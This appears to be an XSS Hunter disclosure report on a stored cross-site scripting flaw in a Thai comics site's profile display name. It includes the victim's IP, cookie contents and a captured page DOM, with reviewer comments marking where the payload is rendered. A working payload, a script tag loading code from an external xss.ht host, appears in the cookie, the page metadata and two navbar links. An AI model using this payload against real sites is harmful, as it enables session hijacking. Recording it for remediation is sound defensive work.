
readme.md

XSS Hunter Report

The page located at https://www.wecomics.in.th/profile/20559376/script-src-https-enwuft-xss-ht-script suffers from a Cross-site Scripting (XSS) vulnerability. XSS is a vulnerability that occurs when user input is unsafely incorporated into the HTML markup of a webpage. When that input is not properly escaped, an attacker can inject malicious JavaScript that, once evaluated, can be used to hijack authenticated sessions and rewrite the vulnerable page's layout and functionality. The following report contains information on an XSS payload that has fired on https://www.wecomics.in.th; it can be used to reproduce and remediate the vulnerability. In the DOM captured below, the profile display name is the value that was rendered as markup: it appears as a script element inside the `user-displayname` link, while the same value in the page title is HTML-escaped.

XSS Payload Fire Details

Vulnerable Page

https://www.wecomics.in.th/profile/20559xxxx/script-src-https-enwuft-xss-ht-script

Victim IP Address

223.205.220.20

Referer

https://www.wecomics.in.th/user/settings/profile

User Agent

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36

Cookies (Non-HTTPOnly)

LOGIN-INFO={%22id%22:205593xxx%2C%22displayName%22:%22%5C%22><script%20src=https://enwuft.xss.ht></script>%22%2C%22imageUrl%22:%22https://image.wecomics.in.th/user/20559xxx/637143143238075104.jpg%22%2C%22coverImageUrl%22:%22http://cdn-img.wecomics.in.th/user/20559xxx/cover-637143144902058587.png%22}

Document Object Model (DOM)
<html lang="th-TH"><head>
    <title>"&gt;&lt;script src=https://enwuft.xss.ht&gt;&lt;/script&gt;</title>
    <meta name="description">
    <meta name="keywords" content="อ่านการ์ตูน, การ์ตูนออนไลน์, อ่านการ์ตูนฟรี, โดจิน, การ์ตูนวาย, มังงะ แปลไทย, WeComicsTH">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta property="og:locale" content="th-TH">
    <meta property="og:type" content="website">
    <meta property="og:site_name" content="WeComics">
    <meta property="og:url" content="https://www.wecomics.in.th/profile/20559xxx/script-src-https-enwuft-xss-ht-script">
    <meta property="og:image" content="https://cdn-img.wecomics.in.th/banner/og-image4.png">
    <meta property="og:title" content="ติดตามผลงานของ &quot;><script src=https://enwuft.xss.ht></script> ได้ที่ WeComics">
    <meta property="og:description" content="ยินดีต้อนรับทุกท่านที่หลงเข้ามาอ่านจนถึงบรรทัดนี้ เราชื่อ “WeComics” เป็นเว็บไซต์ชุมชนการ์ตูนออนไลน์แห่งใหม่ ที่รวบรวมทุกสิ่งที่เกี่ยวข้องในวงการการ์ตูนไว้ในที่เดียว">
    <meta property="fb:app_id" content="427411034449675">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:site" content="@WeComicsTH">
    <meta name="twitter:title" content="ติดตามผลงานของ &quot;><script src=https://enwuft.xss.ht></script> ได้ที่ WeComics">
    <meta name="twitter:description" content="ยินดีต้อนรับทุกท่านที่หลงเข้ามาอ่านจนถึงบรรทัดนี้ เราชื่อ “WeComics” เป็นเว็บไซต์ชุมชนการ์ตูนออนไลน์แห่งใหม่ ที่รวบรวมทุกสิ่งที่เกี่ยวข้องในวงการการ์ตูนไว้ในที่เดียว">
    <meta name="twitter:image" content="https://cdn-img.wecomics.in.th/banner/og-image4.png">
    <link rel="icon" href="/images/icon/icon_wecomics.ico">
    <script async="" src="https://www.googletagmanager.com/gtm.js?id=GTM-5GLMLSD"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <!-- To support old sizes -->
    <link rel="apple-touch-icon" sizes="57x57" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="72x72" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="114x114" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="144x144" href="/images/app-icon.png">
    <!-- To support new sizes  -->
    <link rel="apple-touch-icon" sizes="60×60" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="76×76" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="120×120" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="152×152" href="/images/app-icon.png">
    <link rel="apple-touch-icon" sizes="180×180" href="/images/app-icon.png">
    <!-- To support Android -->
    <link rel="icon" sizes="192×192" href="/images/app-icon.png">
    <link rel="icon" sizes="128×128" href="/images/app-icon.png">
    <link rel="canonical">
    
    
        <link rel="stylesheet" href="/lib/semantic-ui/dist/semantic.min.css?v=_Z28yXtfBv_6_alw-yZuODgTbKZm86IKbPE_5kjO_xY">
        <link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=eZrrJcwDc_3uDhsdt61sL2oOBY362qM3lon1gyExkL0">
        <link rel="stylesheet" href="/css/site.min.css?v=5n9epeZYXvxqtMvRILoS0lwkdiYM3P3MrTQmlwbsQe0">
    
    <!-- Two inline scripts. The first sets the page-level flag isAnalytics to false.
         The second carries a data-dapp-detection attribute and reads like code injected by a
         browser wallet extension rather than code served by the site; confirm before attributing
         it to the application. Neither script references the profile display name. -->
    <script>
        var isAnalytics = false;
    </script><script data-dapp-detection="">
// IIFE: appends <meta name="dapp-detected"> to <head> at most once per execution,
// either immediately (window.web3 already defined) or on the first later read/write of window.web3.
(function() {
  // Guards against appending the meta tag twice within this execution.
  let alreadyInsertedMetaTag = false

  // Creates the marker meta element and attaches it to document.head, once.
  function __insertDappDetected() {
    if (!alreadyInsertedMetaTag) {
      const meta = document.createElement('meta')
      meta.name = 'dapp-detected'
      document.head.appendChild(meta)
      alreadyInsertedMetaTag = true
    }
  }

  if (window.hasOwnProperty('web3')) {
    // Note a closure can't be used for this var because some sites like
    // www.wnyc.org do a second script execution via eval for some reason.
    window.__disableDappDetectionInsertion = true
    // Likely oldWeb3 is undefined and it has a property only because
    // we defined it. Some sites like wnyc.org are evaling all scripts
    // that exist again, so this is protection against multiple calls.
    if (window.web3 === undefined) {
      return
    }
    __insertDappDetected()
  } else {
    // window has no own web3 property yet: install an accessor so that any later
    // read or write triggers detection; the real value is kept in oldWeb3.
    var oldWeb3 = window.web3
    Object.defineProperty(window, 'web3', {
      configurable: true,
      set: function (val) {
        if (!window.__disableDappDetectionInsertion)
          __insertDappDetected()
        oldWeb3 = val
      },
      get: function () {
        if (!window.__disableDappDetectionInsertion)
          __insertDappDetected()
        return oldWeb3
      }
    })
  }
})()</script>
    
    
        <!-- Google Tag Manager -->
        <script>
            // Tag-manager loader: makes sure window.dataLayer exists, pushes a 'gtm.start'
            // timestamp event onto it, then inserts an async <script> for gtm.js in front of
            // the first script element on the page.
            // The container id and the 'dataLayer' name are the literals passed in the call at
            // the bottom; no user-supplied value is concatenated into the script URL.
            // The async gtm.js tag earlier in this captured head matches the URL built here.
            (function (w, d, s, l, i) {
                w[l] = w[l] || []; w[l].push({
                    'gtm.start':
                        new Date().getTime(), event: 'gtm.js'
                }); var f = d.getElementsByTagName(s)[0],
                    j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src =
                        'https://www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f);
            })(window, document, 'script', 'dataLayer', 'GTM-5GLMLSD');
        </script>
        <!-- End Google Tag Manager -->
    
</head>
<body>
    <!-- Google Tag Manager (noscript) -->
    <noscript>
        <iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5GLMLSD"
                height="0" width="0" style="display:none;visibility:hidden"></iframe>
    </noscript>
    <!-- End Google Tag Manager (noscript) -->
    <div id="scrollToTop">
        <i class="fa fa-chevron-up" aria-hidden="true"></i>
    </div>

    <div id="oc-wrapper">
        <div id="oc-header">
            
            <style>
                .element-header {
                    height: 4.3em;
                }

                .w300-c-white {
                    color: white;
                    font-weight: 300 !important;
                }
            </style>
            <script>
                // Delegated click handler bound on document for elements with class icon-store:
                // logs "CLICK", reads the clicked element's data-value and stores it in
                // localStorage under the key 'device'.
                // No element with class icon-store appears in the visible part of this capture.
                $(document).on('click', '.icon-store', function () {
                    console.log("CLICK");
                    var device = $(this).data('value')
                    localStorage.setItem('device', device);
                });
            </script>
            <div class="oc-navbar">
                <div class="oc-hidden-sm-down nav-extra-layout" id="navbar">
                    <div class="oc-container">
                        <div class="ui secondary menu">
                            <a class="item logo" href="/">
                                <img class="nav-logo" src="/images/icon/comics-logo.png?v=PGkqi48vGfmDgHxkGdNfhqUql6mTC1INeC7E2Ar7nbY" alt="comics-logo">
                            </a>
                            <a class="item link w300-c-white" href="/comics">การ์ตูน</a>
                            <a class="item link w300-c-white" href="/illustrations">ภาพวาด</a>
                            <a class="item link w300-c-white" href="/blogs">บล็อก</a>
                                <a class="item link w300-c-white" href="/contests">คอนเทสต์</a>
                            <div class="right menu">
<style>
    .center-cropped {
        background-position: center center;
        background-repeat: no-repeat;
    }
</style>
<!--Start search layout-->
<div class="item dropdown-menu" id="dropdown-menu-search">
    <div class="ui simple dropdown group-element">
        <div class="nav-icon-menu">
            <img src="/images/icon/iconSearch-1.png?v=CLJHnXWRrNt3flAIfQ5do6ZQ0iihwHSgSAcAJT6ZiDI" alt="">
        </div>
        <div class="dropdown-content oc-notification-alert identity search oc-border-gray">
            <div class="dropdown-frame">
                <div class="content-triangle"></div>
                <div class="oc-full-width oc-padding-1em">
                    <div class="ui fluid icon input">
                        <input class="search-keyword-nav" type="text" placeholder="Search..." maxlength="20">
                        <i class="inverted circular search link icon search"></i>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
<div class="item dropdown-menu" id="dropdown-menu-search">
    <div class="ui simple dropdown group-element">
        <a class="nav-icon-menu" href="/feeds">
            <img src="/images/icon/iconFeed-1.png?v=ZjU5zleHZBqvb7Wh70Udg-dF8xWjtnyqhmnozwwCRUk" alt="" style="margin-top: 6px !important;">
        </a>
    </div>
</div>
<!--End search layout-->
    <div class="item dropdown-menu" id="dropdown-menu-notification" data-count="false" data-list="false" data-msg-loading="กำลังโหลดข้อมูล" data-msg-empty="ไม่มีการแจ้งเตือน">
        <div class="ui simple dropdown group-element">
            <div class="alert-number oc-hidden">0</div>
            <div class="nav-icon-menu">
                <img src="/images/icon/iconNoti-1.png?v=2OlhylEDi69FNlqzMVfi6sbmocmzCTxE6ObB705CQks" alt="">
            </div>
            <div class="dropdown-content oc-notification-alert oc-border-gray">
                <div class="dropdown-frame">
                    <div class="content-triangle"></div>
                    <div class="oc-full-width">
                        <div class="oc-list-noti">

                        </div>
                        <a href="/notifications">
                            <div class="oc-list-noti-all">
                                ดูทั้งหมด
                            </div>
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="item dropdown-menu" id="dropdown-menu-user">
        <div class="ui simple dropdown group-element">
            <div class="nav-icon-menu profile avartar " style="background-image: url(&quot;https://image.wecomics.in.th/user/20559xxx/637143143238075104.jpg?w=300&quot;);">
                <img class="link-profile-avatar" src="/images/icon/tranparent/20x20.png?v=lNCszvPpVSa1-tKJJhLFoLdEjDCgbZu78B9gkptv-lA">
            </div>
            <div class="dropdown-content oc-notification-profile oc-border-gray menuright-size" style="display: block;">
                <div class="dropdown-frame menuright-scrollbar">
                    <div class="content-triangle"></div>
                    <div class="ui padded grid">
                        <div class="profile-detail row center-cropped" style="background-size: 100%; background-image: url(&quot;http://cdn-img.wecomics.in.th/user/20559xxx/cover-637143144902058587.png?w=300&quot;);">
                            <div class="profile-image">
                                <a class="link-profile" href="/profile/20559376/script-src-https-enwuft-xss-ht-script" title="">
                                    <div class="profile avartar" style="background-image: url(&quot;https://image.wecomics.in.th/user/20559xxx/637143143238075104.jpg?w=300&quot;);">
                                        <img class="image cover-transparent" src="/images/icon/tranparent/20x20.png" alt="">
                                    </div>
                                </a>
                            </div>
                            <!-- Reviewer note: injection sink (desktop navbar). The display name was parsed as
                                 markup here, so the capture holds a live script element inside the link, while
                                 the copy of the same value in the page title is entity-escaped. Which code writes
                                 this text (server template or client script) is not visible in this capture;
                                 wherever it is written, encode the display name for HTML or assign it as text. -->
                            <div class="profile-info oc-text-single-line">
                                <a class="link-profile link-profile-avatar link-profile-text user-displayname oc-padding-bottom-0em oc-text-single-line column sixteen wide" href="/profile/20559376/script-src-https-enwuft-xss-ht-script" title="">"&gt;<script src="https://enwuft.xss.ht"></script></a>
                            </div>
                            <div class="profile-wallet" id="profile-wallet">
                                <div class="coin profile-wallet-coin">
                                    <img class="icon" src="/images/icon/pang-coin.png?v=TXNvuXNJux3pBRU2m8tafA62TgUw3EtEEESZdmI3TR4" alt="">
                                    <span class="value">0</span>
                                    <a href="/payment/topup" title="เติมเหรียญ">
                                        <img class="icon plus" src="/images/icon/plus-gray.png?v=mztoSexWYCjVNPGNMUUvpCQEs4iIj47sSXeutFZNrmo" alt="">
                                    </a>
                                </div>
                                <div class="key profile-wallet-key">
                                    <img class="icon" src="/images/icon/pang-key.png?v=eOEeXrGBFAHonmXJL2JI82Ushad7Bh1hzIzp_UfNrYo" alt="">
                                    <span class="value">0</span>
                                </div>
                            </div>
                        </div>
                        <div class="profile-menu row">
                            <div class="menu-item column sixteen wide" style="text-align: center;">
                                <img class="img-mature unlock" src="/images/icon/icon-unlock-new.png">
                                <div id="btn-unlock-mature" class="btn-unlock-mature active">
                                    <span>ปลดล็อกเนื้อหาแล้ว</span>
                                </div>
                            </div>
                            <div class="ismature oc-hidden">
                                <div class="ismature-content">
                                    <div class="body">
                                        <div class="title">
                                            <span style="color:black!important;">คุณต้องการปิดเนื้อหาสำหรับผู้ใหญ่</span>
                                        </div>
                                        <img src="/images/meme-mature-v2.png">
                                        <div class="detail oc-padding-top-1em oc-hidden">
                                            <div class="alert-title">คำเตือน</div>
                                            <div class="alert-description">เพื่อป้องกันการเข้าถึงของผู้ที่มีอายุไม่ถึง 18 ปี หากตรวจพบในภายหลังว่าท่านมีเงื่อนไขไม่ตรงตามที่กำหนด ทางทีมงานจะไม่อนุญาตให้ท่านเข้าถึงเนื้อหาดังกล่าว โดยไม่ต้องแจ้งให้ทราบล่วงหน้า</div>
                                        </div>
                                        <div class="oc-padding-top-0-5em">
                                            <button id="btn-cancel-ismature" class="ui button btn-cancel-ismature" style="margin-top: 0.5em !important;border-radius: 1em;width: 150px;">ไว้ก่อนดีกว่า</button>
                                            <button id="btn-confirm-ismature" class="ui comics-color button btn-confirm-ismature" style="margin-top: 0.5em !important;border-radius: 1em;width: 150px;">ต้องการปิด</button>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="oc-payment payment-mini" style="margin-top: -20px !important;">
                                <div class="popup" id="oc-unlock-success">
                                    <div class="popup-inner">
                                        <div class="popup-unlock-close" style="display: block;position: absolute;top: 10px;right: 10px;width: 1.2em;height: 1.2em;color: #fff;padding: 3.5px 0 0 2.5px;text-align: center!important;font-size: 1.4em!important;border-radius: 50%; background: #95989a;opacity: .75;transition: all .3s ease-out;cursor: pointer;">X</div>
                                        <div class="body">
                                            <div class="title">
                                                    <span>ปิดเนื้อหาสำหรับผู้ใหญ่ สำเร็จแล้ว</span>
                                            </div>
                                            <div class="detail">
                                                <div class="comic">ขอให้สนุกกับการอ่านการ์ตูนบน WeComics</div>
                                                <img src="/images/meme-lock.png?v=X0iK_33QZSkrPB1B1UpEfgIDaPotqOh9UM3h07bIG9M" style="width: 45% !important;">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconBookshelf-3.png?v=Sq9tfCnw-N0fWPxkZCLc66LeviO3i74eUkg9F2tzce8" alt="">
                                <a class="menu-text link-favorite" href="/user/favorite/comics/20559376/script-src-https-enwuft-xss-ht-script">
                                    ชั้นหนังสือ
                                </a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/coinbag-gray.png?v=csXecgLo-c3ZyR0rL3z71tSrUl6irxlc4AxfEafr3U0" alt="">
                                <a class="menu-text" href="/payment">เหรียญของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconCoupon-3.png?v=yw2787B9ntg6yBqNsz59CGyovsZumcAEaabuELjQ00U" alt="">
                                <a class="menu-text" href="/payment/coupon">คูปอง</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <div class="hr-item"></div>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconBook-3.png?v=LnEOZi8xLfX7f431to6vzgSr3kKKOkVjNcjPdE1p--4" alt="">
                                <a class="menu-text" href="/User/PortfolioComicsById?userId=20559376">การ์ตูนของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconPicc2-3.png?v=IumJGU2mQ_NPUPCgHaRLSjAUe7dxoLXPz_YvvY694_M" alt="">
                                <a class="menu-text" href="/User/PortfolioIllustrationsById?userId=20559376">ภาพวาดของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconBlog-3.png?v=gTihf-grJev7fzPNe1Le9Z_9pSDmHT_W7pUsIBjxbtc" alt="">
                                <a class="menu-text" href="/User/PortfolioBlogsById?userId=20559376">บล็อกของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <div class="hr-item"></div>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconSetting-3.png?v=H73zbQPD56kyw9HCZNi2c3V3q8GKPD385RuZrYYB3qo" alt="">
                                <a class="menu-text" href="/user/settings/profile">ตั้งค่า</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconHelp-3.png?v=O7knNTQs3eJkuy_efLKbXrk0-gKKPYGUbxd0RMOyaMc" alt="">
                                <a class="menu-text" href="/faq">ช่วยเหลือ</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconSignOut-3.png?v=nOED6ZrhLk3dyTtSfqaz0q0O6yZsG9nh7VooexhBwt8" alt="">
                                <a class="menu-text" href="/account/logout">ออกจากระบบ</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="oc-hidden-md-up nav-normal-layout">
                    <div class="oc-container">
                        <div class="ui secondary menu">
                            <div class="item head-menu">
                                <div class="head-item logo">
                                    <a href="/">
                                        <img class="nav-logo" src="/images/icon/comics-logo.png?v=PGkqi48vGfmDgHxkGdNfhqUql6mTC1INeC7E2Ar7nbY" alt="navlogo">
                                    </a>
                                </div>
                                <div class="head-frame">
                                    <div class="head-block">
                                        <a class="head-menu-text" href="/comics">การ์ตูน</a>
                                        <a class="head-menu-text" href="/illustrations">ภาพวาด</a>
                                        <a class="head-menu-text" href="/blogs">บล็อก</a>
                                        <a class="head-menu-text" href="/authors">นักเขียน</a>
                                            <a class="head-menu-text" href="/contests">คอนเทสต์</a>
                                    </div>
                                </div>
                            </div>
                            <a class="item link oc-hidden-sm-down" href="/comics">การ์ตูน</a>
                            <a class="item link oc-hidden-sm-down" href="/illustrations">ภาพวาด</a>
                            <a class="item link oc-hidden-sm-down" href="/blogs">บล็อก</a>
                            <a class="item link oc-hidden-sm-down" href="/authors">นักเขียน</a>
                            <div class="right menu">
<style>
    .center-cropped {
        background-position: center center;
        background-repeat: no-repeat;
    }
</style>
<!--Start search layout-->
<div class="item dropdown-menu" id="dropdown-menu-search">
    <div class="ui simple dropdown group-element">
        <div class="nav-icon-menu">
            <img src="/images/icon/iconSearch-1.png?v=CLJHnXWRrNt3flAIfQ5do6ZQ0iihwHSgSAcAJT6ZiDI" alt="">
        </div>
        <div class="dropdown-content oc-notification-alert identity search oc-border-gray" style="width: 1351px;">
            <div class="dropdown-frame">
                <div class="content-triangle"></div>
                <div class="oc-full-width oc-padding-1em">
                    <div class="ui fluid icon input">
                        <input class="search-keyword-nav" type="text" placeholder="Search..." maxlength="20">
                        <i class="inverted circular search link icon search"></i>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
<div class="item dropdown-menu" id="dropdown-menu-search">
    <div class="ui simple dropdown group-element">
        <a class="nav-icon-menu" href="/feeds">
            <img src="/images/icon/iconFeed-1.png?v=ZjU5zleHZBqvb7Wh70Udg-dF8xWjtnyqhmnozwwCRUk" alt="" style="margin-top: 6px !important;">
        </a>
    </div>
</div>
<!--End search layout-->
    <div class="item dropdown-menu" id="dropdown-menu-notification" data-count="false" data-list="false" data-msg-loading="กำลังโหลดข้อมูล" data-msg-empty="ไม่มีการแจ้งเตือน">
        <div class="ui simple dropdown group-element">
            <div class="alert-number oc-hidden">0</div>
            <div class="nav-icon-menu">
                <img src="/images/icon/iconNoti-1.png?v=2OlhylEDi69FNlqzMVfi6sbmocmzCTxE6ObB705CQks" alt="">
            </div>
            <div class="dropdown-content oc-notification-alert oc-border-gray" style="width: 1351px;">
                <div class="dropdown-frame">
                    <div class="content-triangle"></div>
                    <div class="oc-full-width">
                        <div class="oc-list-noti">

                        </div>
                        <a href="/notifications">
                            <div class="oc-list-noti-all">
                                ดูทั้งหมด
                            </div>
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="item dropdown-menu" id="dropdown-menu-user">
        <div class="ui simple dropdown group-element">
            <div class="nav-icon-menu profile avartar " style="background-image: url(&quot;https://image.wecomics.in.th/user/20559376/637143143238075104.jpg?w=300&quot;);">
                <img class="link-profile-avatar" src="/images/icon/tranparent/20x20.png?v=lNCszvPpVSa1-tKJJhLFoLdEjDCgbZu78B9gkptv-lA">
            </div>
            <div class="dropdown-content oc-notification-profile oc-border-gray menuright-size" style="display: block;">
                <div class="dropdown-frame menuright-scrollbar">
                    <div class="content-triangle"></div>
                    <div class="ui padded grid">
                        <div class="profile-detail row center-cropped" style="background-size: 100%; background-image: url(&quot;http://cdn-img.wecomics.in.th/user/20559376/cover-637143144902058587.png?w=300&quot;);">
                            <div class="profile-image">
                                <a class="link-profile" href="/profile/20559376/script-src-https-enwuft-xss-ht-script" title="">
                                    <div class="profile avartar" style="background-image: url(&quot;https://image.wecomics.in.th/user/20559376/637143143238075104.jpg?w=300&quot;);">
                                        <img class="image cover-transparent" src="/images/icon/tranparent/20x20.png" alt="">
                                    </div>
                                </a>
                            </div>
                            <!-- Reviewer note: injection sink (small-screen navbar). The display name was parsed
                                 as markup here, so the capture holds a live script element inside the link, while
                                 the copy of the same value in the page title is entity-escaped. Which code writes
                                 this text (server template or client script) is not visible in this capture;
                                 wherever it is written, encode the display name for HTML or assign it as text. -->
                            <div class="profile-info oc-text-single-line">
                                <a class="link-profile link-profile-avatar link-profile-text user-displayname oc-padding-bottom-0em oc-text-single-line column sixteen wide" href="/profile/20559376/script-src-https-enwuft-xss-ht-script" title="">"&gt;<script src="https://enwuft.xss.ht"></script></a>
                            </div>
                            <div class="profile-wallet" id="profile-wallet">
                                <div class="coin profile-wallet-coin">
                                    <img class="icon" src="/images/icon/pang-coin.png?v=TXNvuXNJux3pBRU2m8tafA62TgUw3EtEEESZdmI3TR4" alt="">
                                    <span class="value">0</span>
                                    <a href="/payment/topup" title="เติมเหรียญ">
                                        <img class="icon plus" src="/images/icon/plus-gray.png?v=mztoSexWYCjVNPGNMUUvpCQEs4iIj47sSXeutFZNrmo" alt="">
                                    </a>
                                </div>
                                <div class="key profile-wallet-key">
                                    <img class="icon" src="/images/icon/pang-key.png?v=eOEeXrGBFAHonmXJL2JI82Ushad7Bh1hzIzp_UfNrYo" alt="">
                                    <span class="value">0</span>
                                </div>
                            </div>
                        </div>
                        <div class="profile-menu row">
                            <div class="menu-item column sixteen wide" style="text-align: center;">
                                <img class="img-mature unlock" src="/images/icon/icon-unlock-new.png">
                                <div id="btn-unlock-mature" class="btn-unlock-mature active">
                                    <span>ปลดล็อกเนื้อหาแล้ว</span>
                                </div>
                            </div>
                            <div class="ismature oc-hidden">
                                <div class="ismature-content">
                                    <div class="body">
                                        <div class="title">
                                            <span style="color:black!important;">คุณต้องการปิดเนื้อหาสำหรับผู้ใหญ่</span>
                                        </div>
                                        <img src="/images/meme-mature-v2.png">
                                        <div class="detail oc-padding-top-1em oc-hidden">
                                            <div class="alert-title">คำเตือน</div>
                                            <div class="alert-description">เพื่อป้องกันการเข้าถึงของผู้ที่มีอายุไม่ถึง 18 ปี หากตรวจพบในภายหลังว่าท่านมีเงื่อนไขไม่ตรงตามที่กำหนด ทางทีมงานจะไม่อนุญาตให้ท่านเข้าถึงเนื้อหาดังกล่าว โดยไม่ต้องแจ้งให้ทราบล่วงหน้า</div>
                                        </div>
                                        <div class="oc-padding-top-0-5em">
                                            <button id="btn-cancel-ismature" class="ui button btn-cancel-ismature" style="margin-top: 0.5em !important;border-radius: 1em;width: 150px;">ไว้ก่อนดีกว่า</button>
                                            <button id="btn-confirm-ismature" class="ui comics-color button btn-confirm-ismature" style="margin-top: 0.5em !important;border-radius: 1em;width: 150px;">ต้องการปิด</button>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="oc-payment payment-mini" style="margin-top: -20px !important;">
                                <div class="popup" id="oc-unlock-success">
                                    <div class="popup-inner">
                                        <div class="popup-unlock-close" style="display: block;position: absolute;top: 10px;right: 10px;width: 1.2em;height: 1.2em;color: #fff;padding: 3.5px 0 0 2.5px;text-align: center!important;font-size: 1.4em!important;border-radius: 50%; background: #95989a;opacity: .75;transition: all .3s ease-out;cursor: pointer;">X</div>
                                        <div class="body">
                                            <div class="title">
                                                    <span>ปิดเนื้อหาสำหรับผู้ใหญ่ สำเร็จแล้ว</span>
                                            </div>
                                            <div class="detail">
                                                <div class="comic">ขอให้สนุกกับการอ่านการ์ตูนบน WeComics</div>
                                                <img src="/images/meme-lock.png?v=X0iK_33QZSkrPB1B1UpEfgIDaPotqOh9UM3h07bIG9M" style="width: 45% !important;">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconBookshelf-3.png?v=Sq9tfCnw-N0fWPxkZCLc66LeviO3i74eUkg9F2tzce8" alt="">
                                <a class="menu-text link-favorite" href="/user/favorite/comics/20559376/script-src-https-enwuft-xss-ht-script">
                                    ชั้นหนังสือ
                                </a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/coinbag-gray.png?v=csXecgLo-c3ZyR0rL3z71tSrUl6irxlc4AxfEafr3U0" alt="">
                                <a class="menu-text" href="/payment">เหรียญของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconCoupon-3.png?v=yw2787B9ntg6yBqNsz59CGyovsZumcAEaabuELjQ00U" alt="">
                                <a class="menu-text" href="/payment/coupon">คูปอง</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <div class="hr-item"></div>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconBook-3.png?v=LnEOZi8xLfX7f431to6vzgSr3kKKOkVjNcjPdE1p--4" alt="">
                                <a class="menu-text" href="/User/PortfolioComicsById?userId=20559376">การ์ตูนของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconPicc2-3.png?v=IumJGU2mQ_NPUPCgHaRLSjAUe7dxoLXPz_YvvY694_M" alt="">
                                <a class="menu-text" href="/User/PortfolioIllustrationsById?userId=20559376">ภาพวาดของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconBlog-3.png?v=gTihf-grJev7fzPNe1Le9Z_9pSDmHT_W7pUsIBjxbtc" alt="">
                                <a class="menu-text" href="/User/PortfolioBlogsById?userId=20559376">บล็อกของฉัน</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <div class="hr-item"></div>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconSetting-3.png?v=H73zbQPD56kyw9HCZNi2c3V3q8GKPD385RuZrYYB3qo" alt="">
                                <a class="menu-text" href="/user/settings/profile">ตั้งค่า</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconHelp-3.png?v=O7knNTQs3eJkuy_efLKbXrk0-gKKPYGUbxd0RMOyaMc" alt="">
                                <a class="menu-text" href="/faq">ช่วยเหลือ</a>
                            </div>
                            <div class="menu-item column sixteen wide">
                                <img class="icon" src="/images/icon/iconSignOut-3.png?v=nOED6ZrhLk3dyTtSfqaz0q0O6yZsG9nh7VooexhBwt8" alt="">
                                <a class="menu-text" href="/account/logout">ออกจากระบบ</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div id="sidebar-wrapper">
                <div class="brand">
                    <a class="brand-logo">
                        <img class="expanding-hidden" src="/images/icon/logo-comics.png?v=jL0yNdlJ8EOshgPwmohj_7kADl8VNKKNqNF3LcGNX-U" alt="logocomic">
                    </a>
                </div>
                <nav>
                    <p class="nav-title">NAVIGATION</p>
                    <ul class="nav">
                        <li>
                            <a href="/">
                                <i class="fa fa-home text-success" aria-hidden="true"></i>
                                <span>หน้าหลัก</span>
                            </a>
                        </li>
                        <li>
                            <a href="/comics">
                                <i class="fa fa-rocket" aria-hidden="true"></i>
                                <span>การ์ตูน</span>
                            </a>
                        </li>
                        <li>
                            <a href="/illustrations">
                                <i class="fa fa-picture-o" aria-hidden="true"></i>
                                <span>ภาพวาด</span>
                            </a>
                        </li>
                        <li>
                            <a href="/blogs">
                                <i class="fa fa-list-alt" aria-hidden="true"></i>
                                <span>บล็อก</span>
                            </a>
                        </li>
                    </ul>
                    <p class="nav-title">BONUS</p>
                    <ul class="nav">
                        <li>
                            <a href="/contests">
                                <i class="fa fa-trophy" aria-hidden="true"></i>
                                <span>คอนเทสต์</span>
                            </a>
                        </li>
                    </ul>
                </nav>
            </div>
            <div class="toggle-offscreen-overlay" data-toggle="sidebar-wrapper">
